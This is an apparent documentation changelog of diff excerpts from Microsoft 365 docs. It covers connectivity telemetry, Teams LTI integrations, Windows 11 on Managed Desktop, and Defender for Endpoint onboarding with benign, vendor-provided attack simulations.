+Connectivity optics are generally collected from Microsoft applications, which may be installed on end-user devices or accessed from browsers. Unlike optional data collection within Microsoft 365 services, many of the connectivity optics described here are integral to ensuring that Microsoft meets our availability and performance commitment to customers. These optics allow Microsoft to quickly detect and respond to any issues in the connectivity path between end-users and Microsoft service endpoints. Some of these optics are also used to enable features such as [Network connectivity in the Microsoft 365 Admin Center](office-365-network-mac-perf-overview.md).
+
+## Optics collected from Microsoft 365 applications
+
+Optics are currently collected using infrequent sampling across all devices. As a general matter, the specific set of optics and destinations (service endpoints) which are to be measured in a particular iteration are configured by Microsoft based on service requirements and randomized for sampling purposes.
+At each optics collection interval, one or more of the following measurements may be collected using the end-user device as the measurement source and a Microsoft 365 service endpoint as the measurement destination:
+
+| Measurement | Description |
+| | |
+| Latency | Time taken to retrieve a small file via HTTP |
+| Throughput | Time taken to retrieve a larger file via HTTP, measured rarely to avoid excessive bandwidth consumption |
+| Round Trip Time (RTT) | ICMP ping |
+| Traceroute | ICMP traceroute |
+
+Each measurement is typically associated with additional information, which may include the following items:
+
+| Item | Description |
+| | |
+| Tenant ID | Unique identifier for the customer's Azure Active Directory tenant associated with the end-user device. |
+| Monitor ID | Identifier for the application generating the request (such as Outlook, OneDrive, etc.), provided by the client application that is performing the measurement. |
+| Request ID | Identifier for the measurement request, specified in the measurement configuration provided by Microsoft. |
+| Remote IP | Masked source IP associated with the request from client to service endpoint, provided by the server that received the measurement request and computed based upon the client source IP address that is visible to Microsoft. IP addresses are masked to a /24 subnet for IPv4 addresses or a /48 subnet for IPv6 addresses to ensure that Microsoft cannot identify individual devices or users. |
+| Front-end | Microsoft 365 service front-end identifier, provided by the server that received the measurement request. |
+| Endpoint | Microsoft 365 service endpoint location, provided by the server that received the measurement request. |
+| Certificate Issued By | The "certificate issued by" property of the SSL certificate presented while connecting to the service endpoint, which indicates the certificate authority who issued the certificate to the service endpoint. |
+| Certificate Thumbprint | The "certificate thumbprint" property of the SSL certificate presented while connecting to the service endpoint, which is a publicly accessible unique identifier of the certificate. |
+| Latitude/Longitude | The abstracted latitude and longitude of the end-user device. This is only collected for tenants who have enabled Windows Location Service on end-user devices and have also [enabled collection of this information in the Microsoft 365 admin portal](office-365-network-mac-perf-overview.md#1-enable-windows-location-services). |
+
+## Measurement process
+
+Each end-user device will typically perform a measurement either on a scheduled basis (for installed applications) or based on the action of loading browser pages (for web-based applications). Measurement activities are performed as background operations and do not impact application experience for users. As the measurement types and destinations which will be used for a particular iteration of this process are randomized, customers may notice requests to Microsoft service endpoints in their region that are similar to the typical requests made by end-user devices for normal application connectivity. In addition, customers may notice requests to Microsoft service endpoints that are well outside of their local region. These measurements are often used to ensure optimal routing of customer requests to the best service endpoint, as changes to customer and ISP infrastructure may require Microsoft to change our request routing policies on an ongoing basis. Learn more about how Microsoft routes traffic to the best service endpoint and how to optimize connectivity to Microsoft 365 services in the [Microsoft 365 networking connectivity overview](microsoft-365-networking-overview.md).
+
+## Service endpoints
+
+The Microsoft service endpoints that are used as destinations for these measurements are contained within the published [Office 365 URLs and IP address ranges](urls-and-ip-address-ranges.md). Access to additional service endpoints are not necessary for the collection of these connectivity optics.
enterprise Microsoft 365 Ip Web Service https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/microsoft-365-ip-web-service.md
This URI returns the latest version of the specified Office 365 service instance
} ```
-Example 3 request URI: <https://endpoints.office.com/version/Worldwide?Format=CSV&amp;ClientRequestId=b10c5ed1-bad1-445f-b386-b919946339a7>
+Example 3 request URI: <https://endpoints.office.com/version/Worldwide?Format=CSV&ClientRequestId=b10c5ed1-bad1-445f-b386-b919946339a7>
This URI shows output in CSV format. Example result:
instance,latest
Worldwide,2018063000 ```
-Example 4 request URI: <https://endpoints.office.com/version/Worldwide?AllVersions=true&amp;ClientRequestId=b10c5ed1-bad1-445f-b386-b919946339a7>
+Example 4 request URI: <https://endpoints.office.com/version/Worldwide?AllVersions=true&ClientRequestId=b10c5ed1-bad1-445f-b386-b919946339a7>
This URI shows all prior versions that have been published for the Office 365 worldwide service instance. Example result:
enterprise Ms Cloud Germany Transition Add Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/ms-cloud-germany-transition-add-devices.md
It's critical to your success that you only unregister and re-register your devi
To check whether your devices are registered in the public cloud, you should export and download the list of devices from the Azure AD portal to an Excel spreadsheet. Then, filter the devices that are registered (by using the _registeredTime_ column) after the date when your organization has passed [phase 9 of the migration process](ms-cloud-germany-transition-phases.md#phase-9--10-azure-ad-finalization).
-**Do I still need to add the DNS name as stated in this [Create DNS records for Microsoft using Windows-based DNS](https://docs.microsoft.com/en-us/microsoft-365/admin/dns/create-dns-records-using-windows-based-dns?view=o365-worldwide#add-two-cname-records-for-mobile-device-management-mdm-for-microsoft)
+**Do I still need to add the DNS name as stated in [Create DNS records for Microsoft using Windows-based DNS](/microsoft-365/admin/dns/create-dns-records-using-windows-based-dns?view=o365-worldwide#add-two-cname-records-for-mobile-device-management-mdm-for-microsoft)?**
This DNS entry is no longer needed for re-registering your device.
lti Teams Classes With Blackboard https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/lti/teams-classes-with-blackboard.md
Title: Integrate Microsoft Teams classes with Blackboard Learn Ultra
+ Title: Use Microsoft Teams classes with Blackboard Learn Ultra
f1.keywords:
localization_priority: Normal
-description: "Integrate Microsoft Teams classes with Blackboard Learn Ultra"
+description: "Use Microsoft Teams classes with Blackboard Learn Ultra"
# Use Microsoft Teams classes with Blackboard Learn Ultra
Teamwork is at the core of every modern organization. By fostering collaboration
Your classes might include real-time conversations, video meetings, or asynchronous interactions. You can add file sharing and cocreation experiences for your students, all in one place. Microsoft Teams classes with Learn Ultra redefine the dynamics of teaching and what effective learning means. > [!IMPORTANT]
-> Ensure that you have successfully set up the Institution Email field in your Student Information System (SIS) `help.blackboard.com/Learn/Administrator/SaaS/Integrations/Student\_Information\_System/SIS\_Planning`
+> Ensure that you have successfully set up the Institution Email field in your [Student Information System (SIS)](https://help.blackboard.com/Learn/Administrator/SaaS/Integrations/Student_Information_System/SIS_Planning)
>
->The Microsoft Teams classes integration relies on the institution email field in your SIS to map to the correct Microsoft Azure Active DirectoryΓÇÖs (AAD) User Principal Name (UPN). If no institution email has been provisioned, this will default to the existing email. ItΓÇÖs recommended that this field be set for every user to ensure their data is synchronized correctly and that there is no conflict of email data between Microsoft AAD and Blackboard Learn Ultra.
+>The Microsoft Teams classes integration relies on the institution email field in your SIS to map to the correct Microsoft Azure Active DirectoryΓÇÖs (AAD) [User Principle Name (UPN)](/azure/active-directory/hybrid/howto-troubleshoot-upn-changes). If no institution email has been provisioned, this will default to the existing email. ItΓÇÖs recommended that this field be set for every user to ensure their data is synchronized correctly and that there is no conflict of email data between AAD and Blackboard Learn Ultra.
> > If you havenΓÇÖt set this field appropriately in your SIS mapping, the integration will continue to work, but users might not appear in the Teams classes created, and errors could occur. ## Supporting Institutional Data Mapping ΓÇô Institution Email SIS Field
-As part of the evolution with Cloud provider integrations, Blackboard Learn Ultra has created a new **Institution Email** field, in both the Student Information System Framework integration and public REST APIs, allowing institutions to manage the data synchronization process effectively between Blackboard Learn Ultra and Microsoft AAD.
+As part of the evolution with Cloud provider integrations, Blackboard Learn Ultra has created a new **Institution Email** field, in both the Student Information System Framework integration and public REST APIs, allowing institutions to manage the data synchronization process effectively between Blackboard Learn Ultra and AAD.
### What does the Institution Email mean and what does it support?
The Microsoft Teams classes integration is available for **Ultra Course View cou
- Have Blackboard Learn Ultra Learn SaaS with Ultra Base Navigation enabled
+ ![an example of the feature is enabled in courses](media/feature-availability.png)
+ - Enable LTI for use in courses. a. Go to the **Administrator Panel** > **LTI Tool Providers** > **Manage Global Properties**.
If you choose to approve the Blackboard Learn Ultra Teams Classes Azure app befo
> [!NOTE] > YouΓÇÖll replace **{Tenant}** with your specific institutional Microsoft Azure tenant ID.
+You'll see a permissions window that explains you're giving permission to Blackboard Learn Ultra to access Microsoft Teams.
+
+![the permissions window for Microsoft and Blackboard](media/permissions1.png)
+ ### After Configuring the LTI Applications 1. On the **Administrator Panel**, navigate to **Tools and Utilities** and select **Microsoft Teams Integration Admin**.
If you choose to approve the Blackboard Learn Ultra Teams Classes Azure app befo
- If consent hasnΓÇÖt been approved, follow the steps described to generate the URL for consent and send it to the Microsoft 365 Global Admin for approval. 5. Once you've confirmation of approval, select **Retry** to confirm, and then select **Submit**.+
+ ![A dialog that indicates your access has been blocked](media/blocked-access.png)
lti Teams Meetings With Canvas https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/lti/teams-meetings-with-canvas.md
description: "Integrate Microsoft Teams meetings with Canvas"
# Use Microsoft Teams meetings with Canvas
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
- Microsoft Teams meetings is a Learning Tools Interoperability (LTI) app that helps educators and students easily navigate between their Learning Management System (LMS) and Teams. Users can access their class teams associated with their course directly from within their LMS. ## Microsoft Office 365 Admin
managed-desktop Win11 Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/managed-desktop/intro/win11-overview.md
+
+ Title: Microsoft Managed Desktop and Windows 11
+description: How and when Windows 11 is available in the service
+keywords: Microsoft Managed Desktop, Microsoft 365, service, documentation
+++++
+ms.localizationpriority: normal
+++
+# Microsoft Managed Desktop and Windows 11
+
+Following the announcement of Windows 11, you might have started planning Windows 11 migrations as part of your efforts to keep Windows 10 devices up to date. This article outlines important considerations and how Microsoft Managed Desktop will support smooth transitions in your environments. For information about Windows 11 itself, see [Windows 11 overview](/windows/whats-new/windows-11).
+
+For specific steps to follow to get Windows 11 installed on your Microsoft Managed Desktop devices, see [Preview and test Windows 11 with Microsoft Managed Desktop](../working-with-managed-desktop/test-win11-mmd.md).
+
+## Timeline for Windows 11
+
+Windows 11 preview builds are available starting June 28, 2021 through the [Windows Insider Program](/windows-insider/). We expect release builds to be generally available by the end of calendar year 2021.
+
+You are welcome to install preview builds on devices whether they are managed by Microsoft Managed Desktop or not. WeΓÇÖll continue to support Windows 10 in parallel until it reaches end of support.
+
+When Windows 11 is generally available, we'll do more validation testing. We expect that January 2022 will be the soonest that Windows 11 will be offered to Microsoft Managed Desktop production devices through our standard deployment groups.
+
+We'll consult and advise admins to develop and implement migration plans for each tenant based on technical readiness and your business considerations.
+
+## Assessing pre-release versions of Windows 11
+
+More than 95% of Microsoft Managed Desktop devices are eligible for Windows 11, so you might want to preview the upgrade on test devices prior to production deployment. For more about Windows 11 system requirements, see [Windows 11 requirements](/windows/whats-new/windows-11-requirements). You can request details about the eligibility status of your devices from Microsoft Managed Desktop.
+
+For Microsoft Managed Desktop devices, you can request to add test devices to the **\[Modern Workplace\] Windows 11 Pre-Release Test Devices** device group. This group receives Windows 11 preview builds along with a Microsoft Managed Desktop baseline configuration. Microsoft Managed Desktop doesn't manage the release cadence of Windows 11 preview builds, so members of this device group might receive updates more frequently than Windows 10 device groups.
+
+For your devices that aren't managed by Microsoft Managed Desktop, you can join the [Windows Insider Program](/windows-insider/) to download preview builds and get guidance on deploying Windows 11 yourself. If you have devices running Windows 11 pre-release builds and later enroll them in Microsoft Managed Desktop, they won't revert back to Windows 10.
+
+## Support for pre-release Windows 11 devices
+
+Pre-release builds of any platform are expected to contain defects and application compatibility issues that can be identified and resolved prior to general availability. As a result, we consider devices running pre-release builds of Windows 11 to be test devices, but we do monitor them along with the rest of the environment for security threats and they are subject to the same security alert response as other Microsoft Managed Desktop devices.
+
+Because we are committed to helping you migrate to Windows 11 while remaining productive, we encourage you to report defects you encounter with pre-release builds. We prioritize defects that will block user productivity upon broad deployment of Windows 11, and defects that block user productivity on Windows 10 devices.
+
+## Testing application compatibility
+
+Application compatibility is one of the most common concerns in any platform migration due to the potential for productivity disruptions. We're using several proactive and reactive measures to help you feel confident about smooth app transitions to Windows 11.
+
+### Proactive measures
+
+**Common apps:** Microsoft is extensively testing the most common enterprise applications and suites deployed on builds of Windows 11. We work with external software publishers and internal product teams to resolve any issues discovered during testing. For more information about our proactive compatibility testing effort, see the [Application Compatibility blog](https://blogs.windows.com/windowsexperience/2019/01/15/application-compatibility-in-the-windows-ecosystem/).
+
+**Line-of-business apps:** [Test Base](https://www.microsoft.com/testbase) is a resource that app publishers and IT admins can use to submit apps and test cases for Microsoft to run on a virtual machine running Windows 11 builds in a secure Azure environment. Results, test insights, and regression analysis for each test execution are available to you on a private Azure portal. Microsoft Managed Desktop will help you prioritize your line-of-business apps for validation based on app usage and reliability data. For more information about Test Base, see [Test Base for Microsoft 365](https://techcommunity.microsoft.com/t5/windows-it-pro-blog/test-base-for-microsoft-365-microsoft-ignite-2021-updates/ba-p/2185566).
+
+### Reactive measures
+
+If you encounter app compatibility issues in test or production environments, you can get support by engaging [App Assure](/fasttrack/products-and-capabilities) or FastTrack, as appropriate. For Windows 11, this includes any functionality with Office, Microsoft Edge, and Teams applications running on the latest operating system builds. App Assure directly engages app publishers to prioritize and resolve app compatibility issues.
managed-desktop Test Win11 Mmd https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/managed-desktop/working-with-managed-desktop/test-win11-mmd.md
+
+ Title: Preview and test Windows 11 with Microsoft Managed Desktop
+description: How to get Windows 11 in your environment
+keywords: Microsoft Managed Desktop, Microsoft 365, service, documentation
+++++
+ms.localizationpriority: normal
+++
+# Preview and test Windows 11 with Microsoft Managed Desktop
+
+ How to enroll and participate in the Windows 11 compatibility testing program within your Microsoft Managed Desktop environment. For more about Windows 11 and Microsoft Managed Desktop generally, see [Windows 11 and Microsoft Managed Desktop](../intro/win11-overview.md).
+
+## Check device eligibility
+
+To date, more than 95% of Microsoft Managed Desktop devices meet [eligibility criteria for Windows 11](/windows/whats-new/windows-11-requirements). You can request details about the eligibility status of your devices from Microsoft Managed Desktop. To file the request, follow these steps:
+
+1. Open a new service request with the Microsoft Managed Desktop Service Engineering team. If you need more info on how to do file the request, see [Admin support](admin-support.md).
+2. Use these values for the fields:
+ - Title: Windows 11 device eligibility
+ - Request type: Request for information
+ - Category: Devices
+ - Subcategory: Other
++
+## Add devices to the Windows 11 test group
+
+Start by adding devices to the device group (**\[Modern Workplace\] Windows 11 Pre-Release Test Devices**) created for testing and evaluating Windows 11. Devices in this group get new Windows 11 builds and Microsoft Managed Desktop baseline configurations as they become available and are monitored for reliability issues.
+
+You can choose any of your existing or new devices for Windows 11 testing, but you shouldn't enroll production devices in this group due to the elevated risk of defects or compatibility issues in pre-release builds. Prior device group assignments are removed upon assignment to this group.
+
+To enroll your devices in the pre-release test group:
+
+1. Open a new service request with the Microsoft Managed Desktop Service Engineering team.
+2. Use these values for the fields:
+ - Title: Windows 11 compatibility enrollment
+ - Request type: Change request
+ - Category: Devices
+ - Subcategory: Deployment group assignment
+3. In the description field, list the serial numbers of the devices that you want to use for Windows 11 testing. Note which, if any, of the specified devices aren't yet deployed in your Microsoft Managed Desktop tenant.
+
+## Prioritize applications to submit to Test Base
+
+Business-critical applications are the best candidates for more validation in a closed Windows 11 environment. We can help you prioritize apps for Windows 11 testing based on usage and reliability data. To request our recommendations, follow these steps:
+
+1. Open a new service request with the Microsoft Managed Desktop Service Engineering team. If you need more info on how to do file the request, see [Admin support](admin-support.md).
+2. Use these values for the fields:
+ - Title: Windows 11 Test Base candidates
+ - Request type: Request for information
+ - Category: Apps
+ - Subcategory: Other
+
+## Report issues
+
+If you encounter Windows 11 compatibility issues with your line-of-business or Microsoft 365 apps, report them to us for investigation and remediation. To report an issue, follow these steps:
+
+1. Open a new service request with the Microsoft Managed Desktop Service Engineering team.
+2. Use these values for the fields:
+ - Title: Windows 11 compatibility testing
+ - Request type: Incident
+ - Category: Devices
+ - Subcategory: Windows Upgrade/Update
+3. Describe the behavior and how severely it would hinder your business in a production environment.
+
+Microsoft Managed Desktop triages and handles issues with pre-release builds based on the effect on productivity. While our service description doesn't cover issues with pre-release builds, we'll confer with customer admins to ensure that issues that block user productivity are resolved prior to starting migration within any given tenant.
security Configure Endpoints Non Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-non-windows.md
You'll need to take the following steps to onboard non-Windows devices:
- For macOS devices, you can choose to onboard through Microsoft Defender for Endpoint or through a third-party solution. For more information, see [Microsoft Defender for Endpoint on Mac](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac).
- - For other non-Windows devices choose **Onboard non-Windows devices through third-party integration**.
+ - For other non-Windows devices, choose **Onboard non-Windows devices through third-party integration**.
1. In the navigation pane, select **Interoperability** > **Partners**. Make sure the third-party solution is listed. 2. In the **Partner Applications** tab, select the partner that supports your non-Windows devices. 3. Select **Open partner page** to open the partner's page. Follow the instructions provided on the page.
security Evaluate Defender Endpoint Enable https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-defender-endpoint-enable.md
+
+ Title: Pilot Defender for Endpoint evaluation
+description: Enable your Microsoft 365 Defender trial lab or pilot environment.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot MDE Evaluation
+
+>[!NOTE]
+>For the purpose of guiding you through a typical deployment, this scenario will only cover the use of Microsoft Endpoint Configuration Manager. Defender for Endpoint supports the use of other onboarding tools but won't cover those scenarios in the deployment guide. For more information, see [Onboard devices to Microsoft Defender for Endpoint](onboard-configure.md).
+
+## Step 1. Check license state
+
+Checking for the license state and whether it got properly provisioned, can be done through the admin center or through the **Microsoft Azure portal**.
+
+1. To view your licenses, go to the **Microsoft Azure portal** and navigate to the [Microsoft Azure portal license section](https://portal.azure.com/#blade/Microsoft_AAD_IAM/LicensesMenuBlade/Products).
+
+ ![Image of Azure Licensing page](images/atp-licensing-azure-portal.png)
+
+1. Alternately, in the admin center, navigate to **Billing** > **Subscriptions**.
+
+ On the screen, you'll see all the provisioned licenses and their current **Status**.
+
+ ![Image of billing licenses](images/atp-billing-subscriptions.png)
+
+## Step 2. Onboard endpoints using any of the supported management tools
+
+The [Plan deployment](deployment-strategy.md) topic outlines the general steps you need to take to deploy Defender for Endpoint.
+
+Watch this video for a quick overview of the onboarding process and learn about the available tools and methods.
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bGqr]
+
+After identifying your architecture, you'll need to decide which deployment method to use. The deployment tool you choose influences how you onboard endpoints to the service.
+
+### Onboarding tool options
+
+The following table lists the available tools based on the endpoint that you need to onboard.
+
+| Endpoint | Tool options |
+|--||
+| **Windows** | [Local script (up to 10 devices)](../defender-endpoint/configure-endpoints-script.md) <br> [Group Policy](../defender-endpoint/configure-endpoints-gp.md) <br> [Microsoft Endpoint Manager/ Mobile Device Manager](../defender-endpoint/configure-endpoints-mdm.md) <br> [Microsoft Endpoint Configuration Manager](../defender-endpoint/configure-endpoints-sccm.md) <br> [VDI scripts](../defender-endpoint/configure-endpoints-vdi.md) <br> [Integration with Azure Defender](../defender-endpoint/configure-server-endpoints.md#integration-with-azure-defender) |
+| **macOS** | [Local scripts](../defender-endpoint/mac-install-manually.md) <br> [Microsoft Endpoint Manager](../defender-endpoint/mac-install-with-intune.md) <br> [JAMF Pro](../defender-endpoint/mac-install-with-jamf.md) <br> [Mobile Device Management](../defender-endpoint/mac-install-with-other-mdm.md) |
+| **Linux Server** | [Local script](../defender-endpoint/linux-install-manually.md) <br> [Puppet](../defender-endpoint/linux-install-with-puppet.md) <br> [Ansible](../defender-endpoint/linux-install-with-ansible.md)|
+| **iOS** | [App-based](../defender-endpoint/ios-install.md) |
+| **Android** | [Microsoft Endpoint Manager](../defender-endpoint/android-intune.md) |
security Evaluate Defender Endpoint Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-defender-endpoint-overview.md
+
+ Title: Evaluate Microsoft 365 Defender for Endpoint overview
+description: Set up a Microsoft 365 Defender trial lab or pilot environment. Test and experience how the security solution is designed to protect devices, identity, data, and apps in your organization.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate Microsoft 365 Defender for Endpoint overview
+
+**Applies to:**
+
+- Microsoft 365 Defender
+
+![Microsoft 365 Defender evaluation and piloting process](../../media/defender/m365-defender-eval-process.png)
+
+Comprehensive security product evaluations can be a complex process, requiring cumbersome environment and device configurations before an end-to-end attack simulation can actually be done. Adding to the complexity is the challenge of tracking where the simulation activities, alerts, and results are reflected during the evaluation.
+
+The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the complexities of device and environment configuration. This enables you to:
+
+- Focus on evaluating the capabilities of the platform
+- Run simulations
+- See the prevention, detection, and remediation features in action
+<br>
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4woug]
+
+Using the simplified set-up experience, you can focus on running your own test scenarios and the pre-made simulations to see how Defender for Endpoint performs.
+
+You'll have full access to the powerful capabilities of the platform such as automated investigations, advanced hunting, and threat analytics, allowing you to test the comprehensive protection stack that Defender for Endpoint offers.
+
+You can add Windows 10 or Windows Server 2019 devices that come pre-configured to have the latest OS versions and the right security components in place as well as Office 2019 Standard installed.
+
+You can also install threat simulators. Defender for Endpoint has partnered with industry leading threat simulation platforms to help you test out the Defender for Endpoint capabilities without having to leave the portal.
+
+ Install your preferred simulator, run scenarios within the evaluation lab, and then instantly see how the platform performs. This capability is all conveniently available at no extra cost to you. You'll also have convenient access to wide array of simulations, which you can access and run from the simulations catalog.
security Evaluate Defender Endpoint Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-defender-endpoint-pilot.md
+
+ Title: Experience Microsoft Defender for Endpoint (MDE) through simulated attacks
+description: Pilot your Microsoft 365 Defender trial lab or pilot environment.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Experience Microsoft Defender for Endpoint (MDE) through simulated attacks
+
+>[!TIP]
+>
+>- Learn about the latest enhancements in Microsoft Defender for Endpoint: [What's new in Defender for Endpoint?](https://cloudblogs.microsoft.com/microsoftsecure/2018/11/15/whats-new-in-windows-defender-atp/).
+>- Defender for Endpoint demonstrated industry-leading optics and detection capabilities in the recent MITRE evaluation. Read: [Insights from the MITRE ATT&CK-based evaluation](https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/insights-from-the-mitre-attack-based-evaluation-of-windows-defender-atp/).
+
+You might want to experience Defender for Endpoint before you onboard more than a few devices to the service. To do this, you can run controlled attack simulations on a few test devices. After running the simulated attacks, you can review how Defender for Endpoint surfaces malicious activity and explore how it enables an efficient response.
+
+## Before you begin
+
+To run any of the provided simulations, you need at least [one onboarded device](onboard-configure.md).
+
+Read the walkthrough document provided with each attack scenario. Each document includes OS and application requirements as well as detailed instructions that are specific to an attack scenario.
+
+## Run a simulation
+
+1. In **Help** > **Simulations & tutorials**, select which of the available attack scenarios you would like to simulate:
+
+ - **Scenario 1: Document drops backdoor** - simulates delivery of a socially engineered lure document. The document launches a specially crafted backdoor that gives attackers control.
+
+ - **Scenario 2: PowerShell script in fileless attack** - simulates a fileless attack that relies on PowerShell, showcasing attack surface reduction and device learning detection of malicious memory activity.
+
+ - **Scenario 3: Automated incident response** - triggers automated investigation, which automatically hunts for and remediates breach artifacts to scale your incident response capacity.
+
+2. Download and read the corresponding walkthrough document provided with your selected scenario.
+
+3. Download the simulation file or copy the simulation script by navigating to **Help** > **Simulations & tutorials**. You can choose to download the file or script on the test device but it's not mandatory.
+
+4. Run the simulation file or script on the test device as instructed in the walkthrough document.
+
+> [!NOTE]
+> Simulation files or scripts mimic attack activity but are actually benign and will not harm or compromise the test device.
+>
+
+## ALTERNATE TOPIC TEXT
+
+## Simulate attack scenarios
+
+Use the test devices to run your own attack simulations by connecting to them.
+
+You can simulate attack scenarios using:
+
+- The ["Do It Yourself" attack scenarios](https://securitycenter.windows.com/tutorials)
+- Threat simulators
+
+You can also use [Advanced hunting](advanced-hunting-overview.md) to query data and [Threat analytics](threat-analytics.md) to view reports about emerging threats.
+
+### Do-it-yourself attack scenarios
+
+If you are looking for a pre-made simulation, you can use our ["Do It Yourself" attack scenarios](https://securitycenter.windows.com/tutorials). These scripts are safe, documented, and easy to use. These scenarios will reflect Defender for Endpoint capabilities and walk you through investigation experience.
+
+>[!NOTE]
+>The connection to the test devices is done using RDP. Make sure that your firewall settings allow RDP connections.
+
+1. Connect to your device and run an attack simulation by selecting **Connect**.
+
+ ![Image of the connect button for test devices](images/test-machine-table.png)
+
+2. Save the RDP file and launch it by selecting **Connect**.
+
+ ![Image of remote desktop connection](images/remote-connection.png)
+
+ >[!NOTE]
+ >If you don't have a copy of the password saved during the initial setup, you can reset the password by selecting **Reset password** from the menu:
+ > ![Image of reset password](images/reset-password-test-machine.png)
+ >
+ > The device will change itΓÇÖs state to ΓÇ£Executing password reset", then youΓÇÖll be presented with your new password in a few minutes.
+
+3. Enter the password that was displayed during the device creation step.
+
+ ![Image of window to enter credentials](images/enter-password.png)
+
+4. Run Do-it-yourself attack simulations on the device.
+
+### Threat simulator scenarios
+
+If you chose to install any of the supported threat simulators during the lab setup, you can run the built-in simulations on the evaluation lab devices.
+
+Running threat simulations using third-party platforms is a good way to evaluate Microsoft Defender for Endpoint capabilities within the confines of a lab environment.
+
+>[!NOTE]
+>
+>Before you can run simulations, ensure the following requirements are met:
+
+>- Devices must be added to the evaluation lab
+>- Threat simulators must be installed in the evaluation lab
+
+1. From the portal select **Create simulation**.
+
+2. Select a threat simulator.
+
+ ![Image of threat simulator selection](images/select-simulator.png)
+
+3. Choose a simulation or look through the simulation gallery to browse through the available simulations.
+
+ You can get to the simulation gallery from:
+ - The main evaluation dashboard in the **Simulations overview** tile or
+ - By navigating from the navigation pane **Evaluation and tutorials** > **Simulation & tutorials**, then select **Simulations catalog**.
+
+4. Select the devices where you'd like to run the simulation on.
+
+5. Select **Create simulation**.
+
+6. View the progress of a simulation by selecting the **Simulations** tab. View the simulation state, active alerts, and other details.
+
+ ![Image of simulations tab](images/simulations-tab.png)
+<br>
+
+After running your simulations, we encourage you to walk through the lab progress bar and explore **Microsoft Defender for Endpoint triggered an automated investigation and remediation**. Check out the evidence collected and analyzed by the feature.
+
+Hunt for attack evidence through advanced hunting by using the rich query language and raw telemetry and check out some world-wide threats documented in Threat analytics.
security Linux Install Manually https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-manually.md
In order to preview new features and provide early feedback, it is recommended t
## Download the onboarding package
-Download the onboarding package from Microsoft Defender Security Center:
+Download the onboarding package from Microsoft 365 Defender portal:
-1. In Microsoft Defender Security Center, go to **Settings > Device Management > Onboarding**.
-2. In the first drop-down menu, select **Linux Server** as the operating system. In the second drop-down menu, select **Local Script (for up to 10 devices)** as the deployment method.
+1. In the Microsoft 365 Defender portal, go to **Settings > Endpoints > Device management > Onboarding**.
+2. In the first drop-down menu, select **Linux Server** as the operating system. In the second drop-down menu, select **Local Script** as the deployment method.
3. Select **Download onboarding package**. Save the file as WindowsDefenderATPOnboardingPackage.zip.
- ![Microsoft Defender Security Center screenshot](images/atp-portal-onboarding-linux.png)
+ ![Microsoft 365 Defender portal screenshot](images/atp-portal-onboarding-linux.png)
4. From a command prompt, verify that you have the file. Extract the contents of the archive:
Download the onboarding package from Microsoft Defender Security Center:
To test out the functionalities of EDR for Linux, follow the steps below to simulate a detection on your Linux server and investigate the case.
-1. Verify that the onboarded Linux server appears in Microsoft Defender Security Center. If this is the first onboarding of the machine, it can take up to 20 minutes until it appears.
+1. Verify that the onboarded Linux server appears in Microsoft 365 Defender. If this is the first onboarding of the machine, it can take up to 20 minutes until it appears.
2. Download and extract the [script file](https://aka.ms/LinuxDIY) to an onboarded Linux server and run the following command: `./mde_linux_edr_diy.sh`
-3. After a few minutes, a detection should be raised in Microsoft Defender Security Center.
+3. After a few minutes, a detection should be raised in Microsoft 365 Defender.
4. Look at the alert details, machine timeline, and perform your typical investigation steps.
security Machine Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-groups.md
